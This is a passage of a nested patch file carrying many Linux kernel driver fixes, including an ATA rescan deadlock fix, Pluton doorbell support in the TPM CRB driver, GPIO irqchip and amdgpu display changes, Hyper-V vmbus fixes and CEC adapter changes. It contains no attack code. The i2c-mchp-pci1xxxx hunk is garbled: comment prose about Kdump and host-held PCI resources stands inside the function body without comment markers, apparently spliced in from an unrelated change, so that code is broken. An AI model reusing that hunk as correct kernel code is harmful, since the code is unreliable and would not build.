+ void ata_scsi_dev_rescan(struct work_struct *work)
+ {
+ 	struct ata_port *ap =
+-		container_of(work, struct ata_port, scsi_rescan_task);
++		container_of(work, struct ata_port, scsi_rescan_task.work);
+ 	struct ata_link *link;
+ 	struct ata_device *dev;
+ 	unsigned long flags;
++	bool delay_rescan = false;
+ 
+ 	mutex_lock(&ap->scsi_scan_mutex);
+ 	spin_lock_irqsave(ap->lock, flags);
+@@ -4618,6 +4619,21 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			if (scsi_device_get(sdev))
+ 				continue;
+ 
++			/*
++			 * If the rescan work was scheduled because of a resume
++			 * event, the port is already fully resumed, but the
++			 * SCSI device may not yet be fully resumed. In that
++			 * case, executing scsi_rescan_device() may cause a
++			 * deadlock with the PM code on device_lock(). Prevent
++			 * this by giving up and retrying rescan after a short
++			 * delay.
++			 */
++			delay_rescan = sdev->sdev_gendev.power.is_suspended;
++			if (delay_rescan) {
++				scsi_device_put(sdev);
++				break;
++			}
++
+ 			spin_unlock_irqrestore(ap->lock, flags);
+ 			scsi_rescan_device(&(sdev->sdev_gendev));
+ 			scsi_device_put(sdev);
+@@ -4627,4 +4643,8 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 
+ 	spin_unlock_irqrestore(ap->lock, flags);
+ 	mutex_unlock(&ap->scsi_scan_mutex);
++
++	if (delay_rescan)
++		schedule_delayed_work(&ap->scsi_rescan_task,
++				      msecs_to_jiffies(5));
+ }
+diff --git a/drivers/base/regmap/regmap-spi-avmm.c b/drivers/base/regmap/regmap-spi-avmm.c
+index 4c2b94b3e30be..6af692844c196 100644
+--- a/drivers/base/regmap/regmap-spi-avmm.c
++++ b/drivers/base/regmap/regmap-spi-avmm.c
+@@ -660,7 +660,7 @@ static const struct regmap_bus regmap_spi_avmm_bus = {
+ 	.reg_format_endian_default = REGMAP_ENDIAN_NATIVE,
+ 	.val_format_endian_default = REGMAP_ENDIAN_NATIVE,
+ 	.max_raw_read = SPI_AVMM_VAL_SIZE * MAX_READ_CNT,
+-	.max_raw_write = SPI_AVMM_VAL_SIZE * MAX_WRITE_CNT,
++	.max_raw_write = SPI_AVMM_REG_SIZE + SPI_AVMM_VAL_SIZE * MAX_WRITE_CNT,
+ 	.free_context = spi_avmm_bridge_ctx_free,
+ };
+ 
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index c45d09a9a9421..e8cb914223cdf 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -2194,6 +2194,7 @@ static void null_destroy_dev(struct nullb *nullb)
+ 	struct nullb_device *dev = nullb->dev;
+ 
+ 	null_del_dev(nullb);
++	null_free_device_storage(dev, false);
+ 	null_free_dev(dev);
+ }
+ 
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 16fc481d60950..916f4ff246c14 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -98,6 +98,8 @@ struct crb_priv {
+ 	u8 __iomem *rsp;
+ 	u32 cmd_size;
+ 	u32 smc_func_id;
++	u32 __iomem *pluton_start_addr;
++	u32 __iomem *pluton_reply_addr;
+ };
+ 
+ struct tpm2_crb_smc {
+@@ -108,6 +110,11 @@ struct tpm2_crb_smc {
+ 	u32 smc_func_id;
+ };
+ 
++struct tpm2_crb_pluton {
++	u64 start_addr;
++	u64 reply_addr;
++};
++
+ static bool crb_wait_for_reg_32(u32 __iomem *reg, u32 mask, u32 value,
+ 				unsigned long timeout)
+ {
+@@ -127,6 +134,25 @@ static bool crb_wait_for_reg_32(u32 __iomem *reg, u32 mask, u32 value,
+ 	return ((ioread32(reg) & mask) == value);
+ }
+ 
++static int crb_try_pluton_doorbell(struct crb_priv *priv, bool wait_for_complete)
++{
++	if (priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON)
++		return 0;
++
++	if (!crb_wait_for_reg_32(priv->pluton_reply_addr, ~0, 1, TPM2_TIMEOUT_C))
++		return -ETIME;
++
++	iowrite32(1, priv->pluton_start_addr);
++	if (wait_for_complete == false)
++		return 0;
++
++	if (!crb_wait_for_reg_32(priv->pluton_start_addr,
++				 0xffffffff, 0, 200))
++		return -ETIME;
++
++	return 0;
++}
++
+ /**
+  * __crb_go_idle - request tpm crb device to go the idle state
+  *
+@@ -145,6 +171,8 @@ static bool crb_wait_for_reg_32(u32 __iomem *reg, u32 mask, u32 value,
+  */
+ static int __crb_go_idle(struct device *dev, struct crb_priv *priv)
+ {
++	int rc;
++
+ 	if ((priv->sm == ACPI_TPM2_START_METHOD) ||
+ 	    (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_START_METHOD) ||
+ 	    (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC))
+@@ -152,6 +180,10 @@ static int __crb_go_idle(struct device *dev, struct crb_priv *priv)
+ 
+ 	iowrite32(CRB_CTRL_REQ_GO_IDLE, &priv->regs_t->ctrl_req);
+ 
++	rc = crb_try_pluton_doorbell(priv, true);
++	if (rc)
++		return rc;
++
+ 	if (!crb_wait_for_reg_32(&priv->regs_t->ctrl_req,
+ 				 CRB_CTRL_REQ_GO_IDLE/* mask */,
+ 				 0, /* value */
+@@ -188,12 +220,19 @@ static int crb_go_idle(struct tpm_chip *chip)
+  */
+ static int __crb_cmd_ready(struct device *dev, struct crb_priv *priv)
+ {
++	int rc;
++
+ 	if ((priv->sm == ACPI_TPM2_START_METHOD) ||
+ 	    (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_START_METHOD) ||
+ 	    (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC))
+ 		return 0;
+ 
+ 	iowrite32(CRB_CTRL_REQ_CMD_READY, &priv->regs_t->ctrl_req);
++
++	rc = crb_try_pluton_doorbell(priv, true);
++	if (rc)
++		return rc;
++
+ 	if (!crb_wait_for_reg_32(&priv->regs_t->ctrl_req,
+ 				 CRB_CTRL_REQ_CMD_READY /* mask */,
+ 				 0, /* value */
+@@ -371,6 +410,10 @@ static int crb_send(struct tpm_chip *chip, u8 *buf, size_t len)
+ 		return -E2BIG;
+ 	}
+ 
++	/* Seems to be necessary for every command */
++	if (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON)
++		__crb_cmd_ready(&chip->dev, priv);
++
+ 	memcpy_toio(priv->cmd, buf, len);
+ 
+ 	/* Make sure that cmd is populated before issuing start. */
+@@ -394,7 +437,10 @@ static int crb_send(struct tpm_chip *chip, u8 *buf, size_t len)
+ 		rc = tpm_crb_smc_start(&chip->dev, priv->smc_func_id);
+ 	}
+ 
+-	return rc;
++	if (rc)
++		return rc;
++
++	return crb_try_pluton_doorbell(priv, false);
+ }
+ 
+ static void crb_cancel(struct tpm_chip *chip)
+@@ -524,15 +570,18 @@ static int crb_map_io(struct acpi_device *device, struct crb_priv *priv,
+ 		return ret;
+ 	acpi_dev_free_resource_list(&acpi_resource_list);
+ 
+-	if (resource_type(iores_array) != IORESOURCE_MEM) {
+-		dev_err(dev, FW_BUG "TPM2 ACPI table does not define a memory resource\n");
+-		return -EINVAL;
+-	} else if (resource_type(iores_array + TPM_CRB_MAX_RESOURCES) ==
+-		IORESOURCE_MEM) {
+-		dev_warn(dev, "TPM2 ACPI table defines too many memory resources\n");
+-		memset(iores_array + TPM_CRB_MAX_RESOURCES,
+-		       0, sizeof(*iores_array));
+-		iores_array[TPM_CRB_MAX_RESOURCES].flags = 0;
++	/* Pluton doesn't appear to define ACPI memory regions */
++	if (priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		if (resource_type(iores_array) != IORESOURCE_MEM) {
++			dev_err(dev, FW_BUG "TPM2 ACPI table does not define a memory resource\n");
++			return -EINVAL;
++		} else if (resource_type(iores_array + TPM_CRB_MAX_RESOURCES) ==
++			   IORESOURCE_MEM) {
++			dev_warn(dev, "TPM2 ACPI table defines too many memory resources\n");
++			memset(iores_array + TPM_CRB_MAX_RESOURCES,
++			       0, sizeof(*iores_array));
++			iores_array[TPM_CRB_MAX_RESOURCES].flags = 0;
++		}
+ 	}
+ 
+ 	iores = NULL;
+@@ -656,6 +705,22 @@ out_relinquish_locality:
+ 	return ret;
+ }
+ 
++static int crb_map_pluton(struct device *dev, struct crb_priv *priv,
++	       struct acpi_table_tpm2 *buf, struct tpm2_crb_pluton *crb_pluton)
++{
++	priv->pluton_start_addr = crb_map_res(dev, NULL, NULL,
++					      crb_pluton->start_addr, 4);
++	if (IS_ERR(priv->pluton_start_addr))
++		return PTR_ERR(priv->pluton_start_addr);
++
++	priv->pluton_reply_addr = crb_map_res(dev, NULL, NULL,
++					      crb_pluton->reply_addr, 4);
++	if (IS_ERR(priv->pluton_reply_addr))
++		return PTR_ERR(priv->pluton_reply_addr);
++
++	return 0;
++}
++
+ static int crb_acpi_add(struct acpi_device *device)
+ {
+ 	struct acpi_table_tpm2 *buf;
+@@ -663,6 +728,7 @@ static int crb_acpi_add(struct acpi_device *device)
+ 	struct tpm_chip *chip;
+ 	struct device *dev = &device->dev;
+ 	struct tpm2_crb_smc *crb_smc;
++	struct tpm2_crb_pluton *crb_pluton;
+ 	acpi_status status;
+ 	u32 sm;
+ 	int rc;
+@@ -700,6 +766,20 @@ static int crb_acpi_add(struct acpi_device *device)
+ 		priv->smc_func_id = crb_smc->smc_func_id;
+ 	}
+ 
++	if (sm == ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		if (buf->header.length < (sizeof(*buf) + sizeof(*crb_pluton))) {
++			dev_err(dev,
++				FW_BUG "TPM2 ACPI table has wrong size %u for start method type %d\n",
++				buf->header.length,
++				ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON);
++			return -EINVAL;
++		}
++		crb_pluton = ACPI_ADD_PTR(struct tpm2_crb_pluton, buf, sizeof(*buf));
++		rc = crb_map_pluton(dev, priv, buf, crb_pluton);
++		if (rc)
++			return rc;
++	}
++
+ 	priv->sm = sm;
+ 	priv->hid = acpi_device_hid(device);
+ 
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index e05d2b227de37..55f6ff1e05aa5 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -772,7 +772,9 @@ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+ 		wake_up_interruptible(&priv->int_queue);
+ 
+ 	/* Clear interrupts handled with TPM_EOI */
++	tpm_tis_request_locality(chip, 0);
+ 	rc = tpm_tis_write32(priv, TPM_INT_STATUS(priv->locality), interrupt);
++	tpm_tis_relinquish_locality(chip, 0);
+ 	if (rc < 0)
+ 		return IRQ_NONE;
+ 
+diff --git a/drivers/gpio/gpio-sifive.c b/drivers/gpio/gpio-sifive.c
+index bc5660f61c570..0f1e1226ebbe8 100644
+--- a/drivers/gpio/gpio-sifive.c
++++ b/drivers/gpio/gpio-sifive.c
+@@ -221,8 +221,12 @@ static int sifive_gpio_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	for (i = 0; i < ngpio; i++)
+-		chip->irq_number[i] = platform_get_irq(pdev, i);
++	for (i = 0; i < ngpio; i++) {
++		ret = platform_get_irq(pdev, i);
++		if (ret < 0)
++			return ret;
++		chip->irq_number[i] = ret;
++	}
+ 
+ 	ret = bgpio_init(&chip->gc, dev, 4,
+ 			 chip->base + SIFIVE_GPIO_INPUT_VAL,
+diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c
+index 5974cfc61b417..6d3e3454a6ed6 100644
+--- a/drivers/gpio/gpiolib.c
++++ b/drivers/gpio/gpiolib.c
+@@ -1650,7 +1650,7 @@ static void gpiochip_irqchip_remove(struct gpio_chip *gc)
+ 	}
+ 
+ 	/* Remove all IRQ mappings and delete the domain */
+-	if (gc->irq.domain) {
++	if (!gc->irq.domain_is_allocated_externally && gc->irq.domain) {
+ 		unsigned int irq;
+ 
+ 		for (offset = 0; offset < gc->ngpio; offset++) {
+@@ -1696,6 +1696,15 @@ int gpiochip_irqchip_add_domain(struct gpio_chip *gc,
+ 
+ 	gc->to_irq = gpiochip_to_irq;
+ 	gc->irq.domain = domain;
++	gc->irq.domain_is_allocated_externally = true;
++
++	/*
++	 * Using barrier() here to prevent the compiler from reordering
++	 * the write to gc->irq.initialized before the irqdomain is added.
++	 */
++	barrier();
++
++	gc->irq.initialized = true;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 53687de6c0530..91c308cf27eb2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -348,6 +348,35 @@ static inline bool is_dc_timing_adjust_needed(struct dm_crtc_state *old_state,
+ 		return false;
+ }
+ 
++/**
++ * update_planes_and_stream_adapter() - Send planes to be updated in DC
++ *
++ * DC has a generic way to update planes and stream via the
++ * dc_update_planes_and_stream() function; however, DM might need some
++ * adjustments and preparation before calling it. This function is a wrapper
++ * for dc_update_planes_and_stream() that does any required configuration
++ * before passing control to DC.
++ */
++static inline bool update_planes_and_stream_adapter(struct dc *dc,
++						    int update_type,
++						    int planes_count,
++						    struct dc_stream_state *stream,
++						    struct dc_stream_update *stream_update,
++						    struct dc_surface_update *array_of_surface_update)
++{
++	/*
++	 * Previous frame finished and HW is ready for optimization.
++	 */
++	if (update_type == UPDATE_TYPE_FAST)
++		dc_post_update_surfaces_to_stream(dc);
++
++	return dc_update_planes_and_stream(dc,
++					   array_of_surface_update,
++					   planes_count,
++					   stream,
++					   stream_update);
++}
++
+ /**
+  * dm_pflip_high_irq() - Handle pageflip interrupt
+  * @interrupt_params: ignored
+@@ -2632,10 +2661,13 @@ static void dm_gpureset_commit_state(struct dc_state *dc_state,
+ 			bundle->surface_updates[m].surface->force_full_update =
+ 				true;
+ 		}
+-		dc_commit_updates_for_stream(
+-			dm->dc, bundle->surface_updates,
+-			dc_state->stream_status->plane_count,
+-			dc_state->streams[k], &bundle->stream_update, dc_state);
++
++		update_planes_and_stream_adapter(dm->dc,
++					 UPDATE_TYPE_FULL,
++					 dc_state->stream_status->plane_count,
++					 dc_state->streams[k],
++					 &bundle->stream_update,
++					 bundle->surface_updates);
+ 	}
+ 
+ cleanup:
+@@ -7870,6 +7902,12 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 		if (acrtc_state->abm_level != dm_old_crtc_state->abm_level)
+ 			bundle->stream_update.abm_level = &acrtc_state->abm_level;
+ 
++		mutex_lock(&dm->dc_lock);
++		if ((acrtc_state->update_type > UPDATE_TYPE_FAST) &&
++				acrtc_state->stream->link->psr_settings.psr_allow_active)
++			amdgpu_dm_psr_disable(acrtc_state->stream);
++		mutex_unlock(&dm->dc_lock);
++
+ 		/*
+ 		 * If FreeSync state on the stream has changed then we need to
+ 		 * re-adjust the min/max bounds now that DC doesn't handle this
+@@ -7883,16 +7921,12 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			spin_unlock_irqrestore(&pcrtc->dev->event_lock, flags);
+ 		}
+ 		mutex_lock(&dm->dc_lock);
+-		if ((acrtc_state->update_type > UPDATE_TYPE_FAST) &&
+-				acrtc_state->stream->link->psr_settings.psr_allow_active)
+-			amdgpu_dm_psr_disable(acrtc_state->stream);
+-
+-		dc_commit_updates_for_stream(dm->dc,
+-						     bundle->surface_updates,
+-						     planes_count,
+-						     acrtc_state->stream,
+-						     &bundle->stream_update,
+-						     dc_state);
++		update_planes_and_stream_adapter(dm->dc,
++					 acrtc_state->update_type,
++					 planes_count,
++					 acrtc_state->stream,
++					 &bundle->stream_update,
++					 bundle->surface_updates);
+ 
+ 		/**
+ 		 * Enable or disable the interrupts on the backend.
+@@ -8334,12 +8368,11 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 
+ 
+ 		mutex_lock(&dm->dc_lock);
+-		dc_commit_updates_for_stream(dm->dc,
+-						     dummy_updates,
+-						     status->plane_count,
+-						     dm_new_crtc_state->stream,
+-						     &stream_update,
+-						     dc_state);
++		dc_update_planes_and_stream(dm->dc,
++					    dummy_updates,
++					    status->plane_count,
++					    dm_new_crtc_state->stream,
++					    &stream_update);
+ 		mutex_unlock(&dm->dc_lock);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_g2d.c b/drivers/gpu/drm/exynos/exynos_drm_g2d.c
+index 471fd6c8135f2..27613abeed961 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_g2d.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_g2d.c
+@@ -1335,7 +1335,7 @@ int exynos_g2d_exec_ioctl(struct drm_device *drm_dev, void *data,
+ 	/* Let the runqueue know that there is work to do. */
+ 	queue_work(g2d->g2d_workq, &g2d->runqueue_work);
+ 
+-	if (runqueue_node->async)
++	if (req->async)
+ 		goto out;
+ 
+ 	wait_for_completion(&runqueue_node->complete);
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_vidi.c b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+index 4d56c8c799c5a..f5e1adfcaa514 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_vidi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+@@ -469,8 +469,6 @@ static int vidi_remove(struct platform_device *pdev)
+ 	if (ctx->raw_edid != (struct edid *)fake_edid_info) {
+ 		kfree(ctx->raw_edid);
+ 		ctx->raw_edid = NULL;
+-
+-		return -EINVAL;
+ 	}
+ 
+ 	component_del(&pdev->dev, &vidi_component_ops);
+diff --git a/drivers/gpu/drm/radeon/radeon_gem.c b/drivers/gpu/drm/radeon/radeon_gem.c
+index 261fcbae88d78..75d79c3110389 100644
+--- a/drivers/gpu/drm/radeon/radeon_gem.c
++++ b/drivers/gpu/drm/radeon/radeon_gem.c
+@@ -459,7 +459,6 @@ int radeon_gem_set_domain_ioctl(struct drm_device *dev, void *data,
+ 	struct radeon_device *rdev = dev->dev_private;
+ 	struct drm_radeon_gem_set_domain *args = data;
+ 	struct drm_gem_object *gobj;
+-	struct radeon_bo *robj;
+ 	int r;
+ 
+ 	/* for now if someone requests domain CPU -
+@@ -472,13 +471,12 @@ int radeon_gem_set_domain_ioctl(struct drm_device *dev, void *data,
+ 		up_read(&rdev->exclusive_lock);
+ 		return -ENOENT;
+ 	}
+-	robj = gem_to_radeon_bo(gobj);
+ 
+ 	r = radeon_gem_set_domain(gobj, args->read_domains, args->write_domain);
+ 
+ 	drm_gem_object_put(gobj);
+ 	up_read(&rdev->exclusive_lock);
+-	r = radeon_gem_handle_lockup(robj->rdev, r);
++	r = radeon_gem_handle_lockup(rdev, r);
+ 	return r;
+ }
+ 
+diff --git a/drivers/hid/wacom_sys.c b/drivers/hid/wacom_sys.c
+index fb538a6c4add8..aff4a21a46b6a 100644
+--- a/drivers/hid/wacom_sys.c
++++ b/drivers/hid/wacom_sys.c
+@@ -2417,8 +2417,13 @@ static int wacom_parse_and_register(struct wacom *wacom, bool wireless)
+ 		goto fail_quirks;
+ 	}
+ 
+-	if (features->device_type & WACOM_DEVICETYPE_WL_MONITOR)
++	if (features->device_type & WACOM_DEVICETYPE_WL_MONITOR) {
+ 		error = hid_hw_open(hdev);
++		if (error) {
++			hid_err(hdev, "hw open failed\n");
++			goto fail_quirks;
++		}
++	}
+ 
+ 	wacom_set_shared_values(wacom_wac);
+ 	devres_close_group(&hdev->dev, wacom);
+diff --git a/drivers/hv/channel_mgmt.c b/drivers/hv/channel_mgmt.c
+index cc23b90cae02f..d95e567a190d2 100644
+--- a/drivers/hv/channel_mgmt.c
++++ b/drivers/hv/channel_mgmt.c
+@@ -829,11 +829,22 @@ static void vmbus_wait_for_unload(void)
+ 		if (completion_done(&vmbus_connection.unload_event))
+ 			goto completed;
+ 
+-		for_each_online_cpu(cpu) {
++		for_each_present_cpu(cpu) {
+ 			struct hv_per_cpu_context *hv_cpu
+ 				= per_cpu_ptr(hv_context.cpu_context, cpu);
+ 
++			/*
++			 * In a CoCo VM the synic_message_page is not allocated
++			 * in hv_synic_alloc(). Instead it is set/cleared in
++			 * hv_synic_enable_regs() and hv_synic_disable_regs()
++			 * such that it is set only when the CPU is online. If
++			 * not all present CPUs are online, the message page
++			 * might be NULL, so skip such CPUs.
++			 */
+ 			page_addr = hv_cpu->synic_message_page;
++			if (!page_addr)
++				continue;
++
+ 			msg = (struct hv_message *)page_addr
+ 				+ VMBUS_MESSAGE_SINT;
+ 
+@@ -867,11 +878,14 @@ completed:
+ 	 * maybe-pending messages on all CPUs to be able to receive new
+ 	 * messages after we reconnect.
+ 	 */
+-	for_each_online_cpu(cpu) {
++	for_each_present_cpu(cpu) {
+ 		struct hv_per_cpu_context *hv_cpu
+ 			= per_cpu_ptr(hv_context.cpu_context, cpu);
+ 
+ 		page_addr = hv_cpu->synic_message_page;
++		if (!page_addr)
++			continue;
++
+ 		msg = (struct hv_message *)page_addr + VMBUS_MESSAGE_SINT;
+ 		msg->header.message_type = HVMSG_NONE;
+ 	}
+diff --git a/drivers/hv/vmbus_drv.c b/drivers/hv/vmbus_drv.c
+index e592c481f7aee..b03cb7ae7fd38 100644
+--- a/drivers/hv/vmbus_drv.c
++++ b/drivers/hv/vmbus_drv.c
+@@ -1504,7 +1504,7 @@ static int vmbus_bus_init(void)
+ 	ret = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "hyperv/vmbus:online",
+ 				hv_synic_init, hv_synic_cleanup);
+ 	if (ret < 0)
+-		goto err_cpuhp;
++		goto err_alloc;
+ 	hyperv_cpuhp_online = ret;
+ 
+ 	ret = vmbus_connect();
+@@ -1555,9 +1555,8 @@ static int vmbus_bus_init(void)
+ 
+ err_connect:
+ 	cpuhp_remove_state(hyperv_cpuhp_online);
+-err_cpuhp:
+-	hv_synic_free();
+ err_alloc:
++	hv_synic_free();
+ 	if (vmbus_irq == -1) {
+ 		hv_remove_vmbus_handler();
+ 	} else {
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index a49b14d52a986..ff12018bc2060 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -201,8 +201,8 @@ static void lpi2c_imx_stop(struct lpi2c_imx_struct *lpi2c_imx)
+ /* CLKLO = I2C_CLK_RATIO * CLKHI, SETHOLD = CLKHI, DATAVD = CLKHI/2 */
+ static int lpi2c_imx_config(struct lpi2c_imx_struct *lpi2c_imx)
+ {
+-	u8 prescale, filt, sethold, clkhi, clklo, datavd;
+-	unsigned int clk_rate, clk_cycle;
++	u8 prescale, filt, sethold, datavd;
++	unsigned int clk_rate, clk_cycle, clkhi, clklo;
+ 	enum lpi2c_imx_pincfg pincfg;
+ 	unsigned int temp;
+ 
+diff --git a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+index b21ffd6df9276..5ef136c3ecb12 100644
+--- a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
++++ b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+@@ -1118,8 +1118,10 @@ static int pci1xxxx_i2c_resume(struct device *dev)
+ static DEFINE_SIMPLE_DEV_PM_OPS(pci1xxxx_i2c_pm_ops, pci1xxxx_i2c_suspend,
+ 			 pci1xxxx_i2c_resume);
+ 
+-static void pci1xxxx_i2c_shutdown(struct pci1xxxx_i2c *i2c)
++static void pci1xxxx_i2c_shutdown(void *data)
+ {
++	 * In certain cases (e.g. Kdump) the pci device of interest
++	 * was not cleanly shut down and its resource is still held
++	 * on the host side, so the host could return an invalid
++	 * device status. We need to explicitly request the host to
++	 * release the resource and try to enter D0 again.
+@@ -1156,7 +1158,7 @@ static int pci1xxxx_i2c_probe_pci(struct pci_dev *pdev,
+ 	init_completion(&i2c->i2c_xfer_done);
+ 	pci1xxxx_i2c_init(i2c);
+ 
+-	ret = devm_add_action(dev, (void (*)(void *))pci1xxxx_i2c_shutdown, i2c);
++	ret = devm_add_action(dev, pci1xxxx_i2c_shutdown, i2c);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/input/misc/soc_button_array.c b/drivers/input/misc/soc_button_array.c
+index 09489380afda7..e79f5497948b8 100644
+--- a/drivers/input/misc/soc_button_array.c
++++ b/drivers/input/misc/soc_button_array.c
+@@ -108,6 +108,27 @@ static const struct dmi_system_id dmi_use_low_level_irq[] = {
+ 	{} /* Terminating entry */
+ };
+ 
++/*
++ * Some devices have a wrong entry which points to a GPIO which is
++ * required in another driver, so this driver must not claim it.
++ */
++static const struct dmi_system_id dmi_invalid_acpi_index[] = {
++	{
++		/*
++		 * Lenovo Yoga Book X90F / X90L, the PNP0C40 home button entry
++		 * points to a GPIO which is not a home button and which is
++		 * required by the lenovo-yogabook driver.
++		 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++		.driver_data = (void *)1l,
++	},
++	{} /* Terminating entry */
++};
++
+ /*
+  * Get the Nth GPIO number from the ACPI object.
+  */
+@@ -137,6 +158,8 @@ soc_button_device_create(struct platform_device *pdev,
+ 	struct platform_device *pd;
+ 	struct gpio_keys_button *gpio_keys;
+ 	struct gpio_keys_platform_data *gpio_keys_pdata;
++	const struct dmi_system_id *dmi_id;
++	int invalid_acpi_index = -1;
+ 	int error, gpio, irq;
+ 	int n_buttons = 0;
+ 
+@@ -154,10 +177,17 @@ soc_button_device_create(struct platform_device *pdev,
+ 	gpio_keys = (void *)(gpio_keys_pdata + 1);
+ 	n_buttons = 0;
+ 
++	dmi_id = dmi_first_match(dmi_invalid_acpi_index);
++	if (dmi_id)
++		invalid_acpi_index = (long)dmi_id->driver_data;
++
+ 	for (info = button_info; info->name; info++) {
+ 		if (info->autorepeat != autorepeat)
+ 			continue;
+ 
++		if (info->acpi_index == invalid_acpi_index)
++			continue;
++
+ 		error = soc_button_lookup_gpio(&pdev->dev, info->acpi_index, &gpio, &irq);
+ 		if (error || irq < 0) {
+ 			/*
+diff --git a/drivers/media/cec/core/cec-adap.c b/drivers/media/cec/core/cec-adap.c
+index 4f5ab3cae8a71..b1512f9c5895c 100644
+--- a/drivers/media/cec/core/cec-adap.c
++++ b/drivers/media/cec/core/cec-adap.c
+@@ -1090,7 +1090,8 @@ void cec_received_msg_ts(struct cec_adapter *adap,
+ 	mutex_lock(&adap->lock);
+ 	dprintk(2, "%s: %*ph\n", __func__, msg->len, msg->msg);
+ 
+-	adap->last_initiator = 0xff;
++	if (!adap->transmit_in_progress)
++		adap->last_initiator = 0xff;
+ 
+ 	/* Check if this message was for us (directed or broadcast). */
+ 	if (!cec_msg_is_broadcast(msg))
+@@ -1582,7 +1583,7 @@ static void cec_claim_log_addrs(struct cec_adapter *adap, bool block)
+  *
+  * This function is called with adap->lock held.
+  */
+-static int cec_adap_enable(struct cec_adapter *adap)
++int cec_adap_enable(struct cec_adapter *adap)
+ {
+ 	bool enable;
+ 	int ret = 0;
+@@ -1592,6 +1593,9 @@ static int cec_adap_enable(struct cec_adapter *adap)
+ 	if (adap->needs_hpd)
+ 		enable = enable && adap->phys_addr != CEC_PHYS_ADDR_INVALID;
+ 
++	if (adap->devnode.unregistered)
++		enable = false;
++
+ 	if (enable == adap->is_enabled)
+ 		return 0;
+ 
+diff --git a/drivers/media/cec/core/cec-core.c b/drivers/media/cec/core/cec-core.c
+index af358e901b5f3..7e153c5cad04f 100644
+--- a/drivers/media/cec/core/cec-core.c
++++ b/drivers/media/cec/core/cec-core.c
+@@ -191,6 +191,8 @@ static void cec_devnode_unregister(struct cec_adapter *adap)
+ 	mutex_lock(&adap->lock);
+ 	__cec_s_phys_addr(adap, CEC_PHYS_ADDR_INVALID, false);
+ 	__cec_s_log_addrs(adap, NULL, false);
++	// Disable the adapter (since adap->devnode.unregistered is true)
++	cec_adap_enable(adap);
+ 	mutex_unlock(&adap->lock);
+ 
+ 	cdev_device_del(&devnode->cdev, &devnode->dev);
+diff --git a/drivers/media/cec/core/cec-priv.h b/drivers/media/cec/core/cec-priv.h
+index b78df931aa74b..ed1f8c67626bf 100644
+--- a/drivers/media/cec/core/cec-priv.h
++++ b/drivers/media/cec/core/cec-priv.h
+@@ -47,6 +47,7 @@ int cec_monitor_pin_cnt_inc(struct cec_adapter *adap);
+ void cec_monitor_pin_cnt_dec(struct cec_adapter *adap);
+ int cec_adap_status(struct seq_file *file, void *priv);
+ int cec_thread_func(void *_adap);
++int cec_adap_enable(struct cec_adapter *adap);
+ void __cec_s_phys_addr(struct cec_adapter *adap, u16 phys_addr, bool block);
+ int __cec_s_log_addrs(struct cec_adapter *adap,
+ 		      struct cec_log_addrs *log_addrs, bool block);
+diff --git a/drivers/mmc/host/bcm2835.c b/drivers/mmc/host/bcm2835.c
+index 641ab4f42125b..c15226be4d2a2 100644
+--- a/drivers/mmc/host/bcm2835.c
++++ b/drivers/mmc/host/bcm2835.c
+@@ -1411,8 +1411,8 @@ static int bcm2835_probe(struct platform_device *pdev)
+ 	host->max_clk = clk_get_rate(clk);
+ 
+ 	host->irq = platform_get_irq(pdev, 0);
+-	if (host->irq <= 0) {
+-		ret = -EINVAL;
++	if (host->irq < 0) {
